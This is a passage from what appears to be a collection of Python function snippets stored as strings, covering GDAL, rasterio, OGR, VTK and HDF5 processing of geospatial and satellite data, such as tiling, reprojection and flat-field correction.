tiles - lower the tmaxz if necessary\n if self.options.profile == 'garmin':\n tno = math.ceil(self.out_ds.RasterXSize / self.tilesize) * math.ceil(self.out_ds.RasterYSize / self.tilesize)\n for tz in range(self.tmaxz, 1, -1):\n if tno > 100:\n tno /= 4\n self.tmaxz -= 1\n print \"Warning: GARMIN has a limit 100 tiles per device: lowering the max zoom level to:\", self.tmaxz\n else:\n continue\n\n # Force only one zoom level for the 'garmin' tile profile\n if self.options.profile == 'garmin':\n self.tminz = self.tmaxz\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0, self.tmaxz+1)\n self.tsize = range(0, self.tmaxz+1)\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil( self.out_ds.RasterXSize / tsize )) - 1\n tmaxy = int(math.ceil( self.out_ds.RasterYSize / tsize )) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n self.ct = osr.CoordinateTransformation(self.in_srs, srs4326)\n def rastertileswne(x,y,z):\n pixelsizex = (2**(self.nativezoom-z) * self.out_gt[1]) # X-pixel size in level\n pixelsizey = (2**(self.nativezoom-z) * self.out_gt[5]) # Y-pixel size in level (usually -1*pixelsizex)\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = self.ct.TransformPoint(west, south)[:2]\n east, north = self.ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0,0,0,0)", "def pipeline(inputfile, outputfile, functions, **kwargs):\n 
if not functions:\n raise ValueError('Must have at least one function')\n\n tmpfiles = []\n try:\n previous = inputfile\n for name, f in functions:\n logging.debug(name)\n vrt = f(previous)\n current = vrt.get_tempfile(suffix='.vrt', prefix='gdal')\n tmpfiles.append(current)\n previous = current.name\n logging.info('Rendering reprojected image')\n return vrt.render(outputfile=outputfile, **kwargs)\n finally:\n for f in tmpfiles:\n f.close()", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n # print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # TODO - make the default configurable.\n# if src.crs == None:\n# src.crs = CRS.from_epsg(4326)\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n # print(type(vrt))\n # save the file as an enumerated tiff. 
reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def transform(infile, output, insrs, format_name):\n\n logging.info('Transforming %s from %s to %s' % (infile, insrs, output)) \n in_srs = osr.SpatialReference()\n in_srs.ImportFromEPSG(insrs)\n out_srs = osr.SpatialReference()\n out_srs.ImportFromEPSG(4324)\n coordTrans = osr.CoordinateTransformation(in_srs, out_srs)\n\n in_dsn = ogr.Open(infile)\n in_layer = in_dsn.GetLayer()\n in_feature_definition = in_layer.GetLayerDefn()\n\n out_driver = ogr.GetDriverByName(format_name)\n out_dsn = out_driver.CreateDataSource(output)\n out_layer = out_dsn.CreateLayer(in_layer.GetName(),\n geom_type=in_layer.GetGeomType())\n\n # add fields\n for i in range(0, in_feature_definition.GetFieldCount()):\n fieldDefn = in_feature_definition.GetFieldDefn(i)\n out_layer.CreateField(fieldDefn)\n\n # get the output layer's feature definition\n out_feature_definition = out_layer.GetLayerDefn()\n\n # loop through the input features\n inFeature = in_layer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef().Clone()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = ogr.Feature(out_feature_definition)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, out_feature_definition.GetFieldCount()):\n outFeature.SetField(out_feature_definition.GetFieldDefn(i).GetNameRef(), inFeature.GetField(i))\n # add the feature to the shapefile\n out_layer.CreateFeature(outFeature)\n # destroy the features and get the next input feature\n outFeature.Destroy()\n inFeature.Destroy()\n inFeature = in_layer.GetNextFeature()\n\n # close the shapefiles\n in_dsn.Destroy()\n out_dsn.Destroy()", "def vtp(self, f_vtu, f_vtp):\r\n reader = vtk.vtkXMLUnstructuredGridReader()\r\n reader.SetFileName(f_vtu)\r\n reader.Update()\r\n ugrid = reader.GetOutput()\r\n geometryFilter = vtk.vtkGeometryFilter()\r\n geometryFilter.SetInputData(ugrid)\r\n geometryFilter.Update()\r\n polydata = geometryFilter.GetOutput()\r\n writer =vtk.vtkXMLPolyDataWriter()\r\n writer.SetFileName(f_vtp)\r\n writer.SetInputData(polydata)\r\n writer.Write()\r\n print(\"vtp file created.\")", "def pan_corr(file):\n\n # # infile = 'd:\\\\Projekti\\\\Satelit\\\\CO\\\\Razpis\\\\Flat field images_new2020\\\\flatfield\\\\NHDBflat_1D'\n # # infile = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Jure_naloga_banje_raw_pyt\\\\NHDRGoreMorje_3D'\n #\n # # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\Flat field images_new2020\\\\20201028 Vignetting\\\\flatfield\\\\'\n # # in_pan_ref_file = 'NHDPflat_3D_py.tif'\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Peking_PAN\\\\'\n # in_pan_ref_file = 'NHDPfoc_swp6_1D_py.tif'\n # in_ref = in_path + in_pan_ref_file\n #\n # inreffil = gdal.Open(in_ref)\n # image_ref = inreffil.ReadAsArray()\n # # size_ref = image_ref.shape\n # # pix_count = size_ref[0]*size_ref[1]\n #\n # image_ref = image_ref[800:930, 1420:1640]\n # size_ref = 
image_ref.shape\n # pix_count = size_ref[0] * size_ref[1]\n #\n # g1 = 0.\n # g2 = 0.\n # r1 = 0.\n # b1 = 0.\n #\n # for i in range(size_ref[0]):\n # for j in range(size_ref[1]):\n # if (i % 2) == 0 and (j % 2) == 0: g1 = g1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 1: g2 = g2 + image_ref[i, j]\n # if (i % 2) == 0 and (j % 2) == 1: r1 = r1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 0: b1 = b1 + image_ref[i, j]\n #\n # g1_avg = g1 / pix_count * 4\n # g2_avg = g2 / pix_count * 4\n # r1_avg = r1 / pix_count * 4\n # b1_avg = b1 / pix_count * 4\n #\n # raz_g1 = 1\n # raz_g2 = g1_avg/g2_avg\n # raz_r1 = g1_avg/r1_avg\n # raz_b1 = g1_avg/b1_avg\n #\n # avg = (g1+g2+r1+b1)/pix_count\n #\n # print(g1_avg, g2_avg, r1_avg, b1_avg, avg)\n\n raz_g1 = 1\n raz_g2 = 1.0245196396115988\n raz_r1 = 1.0131841989689434\n raz_b1 = 1.0517113199247086\n\n print('razmerje:', raz_g1, raz_g2, raz_r1, raz_b1)\n\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Peking_PAN\\\\'\n # in_pan_ref_file = 'NHDPfoc_swp6_4D_py.tif'\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\Flat field images_new2020\\\\20201028 Vignetting\\\\flatfield\\\\'\n # in_pan_ref_file = 'NHDPflat_3D_py.tif'\n\n # in_path = 'd:\\Projekti\\Satelit\\CO\\Razpis\\_POSNETKI\\Slo_PAN\\_26_30\\\\'\n # in_pan_ref_file = [filename for filename in os.listdir(in_path) if filename.lower().startswith(\"nhd\") and filename.lower().endswith(\"tif\")]\n\n \n\n \n\n # print('image', i)\n in_ref=file\n inreffil = gdal.Open(in_ref)\n image_ref = inreffil.ReadAsArray()\n size_ref = image_ref.shape\n # pix_count = size_ref[0] * size_ref[1]\n # pix_count = np.count_nonzero(image_ref)\n # pix_count = 3664*650\n\n # g1 = 0.\n # g2 = 0.\n # r1 = 0.\n # b1 = 0.\n #\n # for i in range(size_ref[0]):\n # for j in range(size_ref[1]):\n # if (i % 2) == 0 and (j % 2) == 0: g1 = g1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 1: g2 = g2 + image_ref[i, j]\n # if (i % 2) == 0 and (j % 2) == 1: r1 = r1 + image_ref[i, j]\n # if (i % 2) == 1 and (j % 2) == 0: b1 = b1 + image_ref[i, j]\n #\n # g1_avg = g1 / pix_count * 4\n # g2_avg = g2 / pix_count * 4\n # r1_avg = r1 / pix_count * 4\n # b1_avg = b1 / pix_count * 4\n #\n # avg = (g1 + g2 + r1 + b1) / pix_count\n #\n # print(g1_avg, g2_avg, r1_avg, b1_avg, avg)\n\n # popravek\n im_p_pop = np.zeros((size_ref[0], size_ref[1]), np.uint16)\n\n\n for i in range(size_ref[0]):\n for j in range(size_ref[1]):\n if (i % 2) == 0 and (j % 2) == 0 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_g1\n if (i % 2) == 1 and (j % 2) == 1 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_g2\n if (i % 2) == 0 and (j % 2) == 1 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_r1\n if (i % 2) == 1 and (j % 2) == 0 and image_ref[i, j] != 0: im_p_pop[i, j] = image_ref[i, j] * raz_b1\n \n _,_,_,_,P=return_flatfield_set_path(2)\n P_flat=gdal_array.LoadFile(P)\n \n # im_p_pop=simple_flatfield_corr(P_flat, im_p_pop, 2, 1) \n \n # outout\n \n im_p_pop=BLUE_simple_flatfield_corr(P_flat, im_p_pop)\n \n out=os.path.abspath(file)+\"/corr/\"+os.path.basename(file)[:-4] + \"_pop_flat_corr.tif\"\n\n \n # out = in_ref[:-4] + \"_pop_flat_corr.tif\"\n\n driver = gdal.GetDriverByName('GTiff')\n\n # outRaster = driver.Create(out, size[1], size[0], 3, gdal.GDT_UInt16)\n outRaster = driver.Create(out, size_ref[1], size_ref[0], 1, gdal.GDT_UInt16)\n\n outband = outRaster.GetRasterBand(1)\n outband.WriteArray(im_p_pop)\n outband.FlushCache()", "def main(input_filepath, output_filepath):\n 
logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(file):\n\n # Get the current working directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def open_input(self):\n gdal.AllRegister()\n\n self.out_drv = gdal.GetDriverByName(self.tiledriver)\n self.mem_drv = gdal.GetDriverByName('MEM')\n\n if not self.out_drv:\n raise Exception(\"The '%s' driver was not found, is it available in this GDAL build?\",\n self.tiledriver)\n if not self.mem_drv:\n raise Exception(\"The 'MEM' driver was not found, is it available in this GDAL build?\")\n\n # Open the input file\n\n if self.input_file:\n input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print(\"Input file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n if not input_dataset:\n # Note: GDAL prints the ERROR message too\n exit_with_error(\"It is not possible to open the input file '%s'.\" % self.input_file)\n\n # Read metadata from the input file\n if input_dataset.RasterCount == 0:\n exit_with_error(\"Input file '%s' has no raster band\" % self.input_file)\n\n if input_dataset.GetRasterBand(1).GetRasterColorTable():\n exit_with_error(\n \"Please convert this file to RGB/RGBA and run gdal2tiles on the result.\",\n \"From paletted file you can create RGBA file (temp.vrt) by:\\n\"\n \"gdal_translate -of vrt -expand rgba %s temp.vrt\\n\"\n \"then run:\\n\"\n \"gdal2tiles temp.vrt\" % self.input_file\n )\n\n in_nodata = setup_no_data_values(input_dataset, self.options)\n\n if self.options.verbose:\n print(\"Preprocessed file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)\n\n self.out_srs = setup_output_srs(in_srs, self.options)\n\n # If input and output reference systems are different, we reproject the input dataset into\n # the output reference system for easier manipulation\n\n self.warped_input_dataset = None\n\n if self.options.profile in ('mercator', 'geodetic'):\n\n if not in_srs:\n exit_with_error(\n \"Input file has unknown SRS.\",\n \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\")\n\n if not has_georeference(input_dataset):\n exit_with_error(\n \"There is no georeference - neither affine transformation (worldfile) \"\n \"nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2tiles with parameter -p 'raster' or use another GIS \"\n \"software for georeference e.g. 
gdal_transform -gcp / -a_ullr / -a_srs\"\n )\n\n if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or\n (input_dataset.GetGCPCount() != 0)):\n self.warped_input_dataset = reproject_dataset(\n input_dataset, in_srs, self.out_srs)\n\n if in_nodata:\n self.warped_input_dataset = update_no_data_values(\n self.warped_input_dataset, in_nodata, options=self.options)\n else:\n self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(\n self.warped_input_dataset, options=self.options)\n\n if self.warped_input_dataset and self.options.verbose:\n print(\"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (\n self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize,\n self.warped_input_dataset.RasterCount))\n\n if not self.warped_input_dataset:\n self.warped_input_dataset = input_dataset\n\n #Salva o arquivo reprojetado\n self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,\n self.warped_input_dataset)\n\n # Get alpha band (either directly or from NODATA value)\n self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()\n self.dataBandsCount = nb_data_bands(self.warped_input_dataset)\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print(\"KML autotest OK!\")\n\n # Read the georeference\n self.out_gt = self.warped_input_dataset.GetGeoTransform()\n\n # Test the size of the pixel\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0, 0):\n exit_with_error(\"Georeference of the raster contains rotation or skew. \"\n \"Such raster is not supported. 
Please use gdalwarp first.\")\n\n # Here we expect: pixel is square, no rotation on the raster\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n\n if self.options.verbose:\n print(\"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)\n\n # Calculating ranges for tiles in different zoom levels\n if self.options.profile == 'mercator':\n\n self.mercator = GlobalMercator()\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz is None:\n self.tminz = self.mercator.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\",\n self.mercator.MetersToLatLon(self.ominx, self.ominy),\n self.mercator.MetersToLatLon(self.omaxx, self.omaxy))\n print('MinZoomLevel:', self.tminz)\n print(\"MaxZoomLevel:\",\n self.tmaxz,\n \"(\",\n self.mercator.Resolution(self.tmaxz),\n \")\")\n\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic(self.options.tmscompatible)\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tminz is None:\n self.tminz = self.geodetic.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy)\n\n if self.options.profile == 'raster':\n\n def log2(x):\n return math.log10(x) / 
math.log10(2)\n\n self.nativezoom = int(\n max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print(\"Native zoom of the raster:\", self.nativezoom)\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz is None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz is None:\n self.tmaxz = self.nativezoom\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, self.tmaxz+1))\n self.tsize = list(range(0, self.tmaxz+1))\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1\n tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n ct = osr.CoordinateTransformation(in_srs, srs4326)\n\n def rastertileswne(x, y, z):\n pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = ct.TransformPoint(west, south)[:2]\n east, north = ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa", "def read(cls, file_name=None, lexclude=[], lonly=[], verbose=False):\n###################################################################\n\n # import\n import numpy as np\n \n # init\n \n vf = Velocity_Field()\n\n # fake 4-letters code generation using hexadecimal\n def __gen_fake_code__(n):\n \n FAKE = []\n for i in np.arange(n):\n fake_code = (\"%4s\" % hex(i).split('x')[-1].replace('L', '')).replace(' ', '0')\n FAKE.append(fake_code.upper())\n \n return(np.array(FAKE))\n\n # reads psvelo file\n\n if verbose:\n print(\"-- Reading GMT psvelo file: %s \" % file_name)\n \n try:\n np_vel = np.array(np.mat(np.genfromtxt(file_name, comments='#')))\n except:\n raise IOError(\"!!! Could not read file: %s\" % file_name)\n \n # empty psvelo file\n if np_vel.size == 0:\n return( vf )\n \n if (np_vel.shape[1] == 8):\n if verbose:\n print(\"-- file %s has 8 columns\" % file_name)\n\n np_vel = np.delete(np_vel, -1, axis=1)\n np_code = np.array(np.mat(np.genfromtxt(file_name, comments='#', usecols=(7), dtype=str))).flatten()\n \n elif (np_vel.shape[1] == 3):\n\n if verbose:\n print(\"-- file %s has 3 columns\" % file_name)\n\n np_vel = np.delete(np_vel, -1, axis=1)\n np_code = np.array(np.mat(np.genfromtxt(file_name, comments='#', usecols=(2)))).flatten()\n\n elif (np_vel.shape[1] not in [3, 8]):\n np_code = __gen_fake_code__(np_vel.shape[0])\n else:\n raise IOError(\"!!! 
Could not decipher file content: %s\", file_name)\n\n # populates velocity field\n \n from pyacs.lib.gmtpoint import GMT_Point\n\n lgmt_points = []\n\n for i in np.arange(np_vel.shape[0]):\n\n code = np_code[i]\n \n if np_vel.shape[1] >= 7:\n lon, lat, Ve, Vn, SVe, SVn, SVen = np_vel[i, :]\n M = GMT_Point(lon=lon, lat=lat, Ve=Ve, Vn=Vn, SVe=SVe, SVn=SVn, SVen=SVen, code=code)\n else:\n lon, lat = np_vel[i, :]\n M = GMT_Point(lon=lon, lat=lat, code=code)\n\n if verbose:\n M.get_info(display=True)\n \n # tests whether site will be added\n \n if lonly != []:\n if M.code in lonly:\n lgmt_points.append(M)\n \n else:\n if lexclude != []:\n if M.code not in lexclude:\n lgmt_points.append(M)\n else:\n lgmt_points.append(M)\n \n vf.file_name = file_name\n vf.sites = lgmt_points\n \n return vf", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def createInput(dirPath,gSettings):\n \n with open(os.path.join('../in','input.txt')) as f:\n inpFile = f.readlines()\n \n\n # Model settings\n model = gSettings[\"Model\"]\n inpFile[13] = \"insgrav: {:1d}\\n\".format(int(model[\"NS gravity\"][\"Flag\"]))\n inpFile[14] = \"isun: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Sun\"]))\n inpFile[15] = \"imoon: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Moon\"]))\n\n if model[\"Drag\"][\"Flag\"] == False:\n inpFile[16] = \"idrag: 0\\n\"\n else:\n dm = model[\"Drag\"][\"Model\"].lower()\n if dm == \"wertz\":\n idrag = 1\n elif dm == \"us76\":\n idrag = 2\n elif dm == \"j77\":\n idrag = 3\n elif dm == \"msis00\":\n idrag = 4\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Model\"] + '\" invalid.')\n inpFile[16] = \"idrag: {:1d}\\n\".format(idrag)\n if model[\"Drag\"][\"Solar flux\"].lower() == \"constant\":\n inpFile[17] = \"iF107: 0\\n\"\n elif model[\"Drag\"][\"Solar flux\"].lower() == \"variable\":\n inpFile[17] = \"iF107: 1\\n\"\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Solar flux\"] + '\" invalid.')\n\n if model[\"SRP\"][\"Flag\"] == False:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n else:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n if model[\"SRP\"][\"Eclipses\"]:\n inpFile[18] = \"iSRP: 2\\n\"\n \n if model[\"Lunisolar\"][\"Ephemerides\"] == \"DE431\":\n inpFile[19] = \"iephem: 1\\n\"\n elif model[\"Lunisolar\"][\"Ephemerides\"] == \"Meeus\":\n inpFile[19] = \"iephem: 2\\n\"\n else:\n raise ValueError('Value \"' + model[\"Lunisolar\"][\"Ephemerides\"] + '\" invalid.')\n \n inpFile[20] = \"gdeg: {:3d}\\n\".format(model[\"NS gravity\"][\"Degree\"])\n if model[\"NS gravity\"][\"Order\"] <= model[\"NS gravity\"][\"Degree\"]:\n inpFile[21] = \"gord: {:3d}\\n\".format(model[\"NS gravity\"][\"Order\"])\n else:\n raise ValueError(\"Order {0:d} of the gravity field is greater than degree {1:d}\".format(model[\"NS gravity\"][\"Order\"],model[\"NS gravity\"][\"Degree\"]))\n \n\n\n # Integration settings\n integ = gSettings[\"Integration\"]\n inpFile[29] = \"tol: {:22.15E}\\n\".format(integ[\"Tolerance\"])\n inpFile[30] = \"tspan: {:22.15E}\\n\".format(integ[\"Duration\"] * 365.25)\n inpFile[31] = \"tstep: {:22.15E}\\n\".format(integ[\"Step\"])\n inpFile[39] = \"eqs: {:2d}\\n\".format(integ[\"Equations\"])\n\n\n\n # Output settings\n inpFile[44] = \"verb: 0\\n\"\n inpFile[45] = \"out: \" + os.path.abspath(os.path.join(dirPath, ' '))\n\n\n with open(os.path.join(dirPath,'input.txt'),'w') as f:\n f.writelines(inpFile)", "def 
create_vector_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def read_raytomo_dbase(self, inh5fname, runid, dtype='ph', wtype='ray', create_header=True, Tmin=-999, Tmax=999, verbose=False):\n if dtype is not 'ph' and dtype is not 'gr':\n raise ValueError('data type can only be ph or gr!')\n if wtype is not 'ray' and wtype is not 'lov':\n raise ValueError('wave type can only be ray or lov!')\n stalst = self.waveforms.list()\n if len(stalst) == 0:\n print 'Inversion with surface wave datasets only, not added yet!'\n return\n indset = h5py.File(inh5fname)\n #--------------------------------------------\n # header information from input hdf5 file\n #--------------------------------------------\n dataid = 'reshaped_qc_run_'+str(runid)\n pers = indset.attrs['period_array']\n grp = indset[dataid]\n isotropic = grp.attrs['isotropic']\n org_grp = indset['qc_run_'+str(runid)]\n minlon = indset.attrs['minlon']\n maxlon = indset.attrs['maxlon']\n minlat = indset.attrs['minlat']\n maxlat = indset.attrs['maxlat']\n if isotropic:\n print 'isotropic inversion results do not output gaussian std!'\n return\n dlon_HD = org_grp.attrs['dlon_HD']\n dlat_HD = org_grp.attrs['dlat_HD']\n dlon = org_grp.attrs['dlon']\n dlat = org_grp.attrs['dlat']\n if create_header:\n inv_header = {'minlon': minlon, 'maxlon': maxlon, 'minlat': minlat, 'maxlat': maxlat,\n 'dlon': dlon, 'dlat': dlat, 'dlon_HD': dlon_HD, 'dlat_HD': dlat_HD}\n self.add_auxiliary_data(data=np.array([]), data_type='Header', path='raytomo', parameters=inv_header)\n self._get_lon_lat_arr(path='raytomo', hd=True)\n for staid in stalst:\n netcode, stacode = staid.split('.')\n staid_aux = netcode+'_'+stacode\n stla, elev, stlo = self.waveforms[staid].coordinates.values()\n if stlo < 0.:\n stlo += 360.\n if stla > maxlat or stla < minlat or stlo > maxlon or stlo < minlon:\n print 'WARNING: station: '+ staid+', lat = '+str(stla)+' lon 